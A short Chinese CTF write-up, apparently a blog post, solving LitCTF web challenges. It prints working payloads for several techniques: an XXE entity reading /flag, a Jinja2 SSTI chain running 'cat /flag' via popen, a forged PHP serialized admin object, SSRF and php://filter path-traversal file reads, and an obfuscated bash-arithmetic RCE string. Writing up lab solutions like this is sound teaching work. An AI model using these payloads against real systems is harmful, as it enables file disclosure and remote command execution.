Litctf-web

Litctf-web

exx

xxe,

html 复制代码
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个...池子

ssti,没有过滤

{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System

反序列化

php 复制代码
<?php

class User {

    public $username="admin";

    public $password="secure_password";

}
$a=new User();
echo base64_encode(serialize($a));

?>
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?

ssrf

file:///flag
高亮主题(划掉)背景查看器

文件包含伪协议

POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

百万美元的诱惑

rce

/下

?a[]=1&b[]=2&c=2025a

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
相关推荐
safe0303 分钟前
SPA和SSR
开发语言·前端·javascript·汇编·vue.js·react.js·前端框架
wangqiaowq6 分钟前
CentOS 7.9.2009更新仓库已经被移除或者不再维护
linux·运维·centos
二川bro7 分钟前
“前端兼容——CSS篇”(进阶版)
前端·css
IT生活课堂8 分钟前
唤醒车机时娱乐屏出现黑屏,卡顿的案例分享
android·智能手机·汽车
bala55698 分钟前
Docker-在Centos中部署Shell脚本获取镜像并构建容器
linux·阿里云·docker·容器·centos·maven
墨如初见11 分钟前
CentOS 系统刷新 DNS,解析
linux·运维·centos
知数SEO13 分钟前
Centos如何卸载docker
linux·docker·centos
GISer_Jing1 小时前
CSS常见适配布局方式
前端·css·html
知孤云出岫1 小时前
华为配置手工负载分担模式链路聚合实验
java·linux·网络
翔云API1 小时前
PC端增值税发票识别API-翔云智能财务发票识别OCR接口
android·c语言·开发语言·php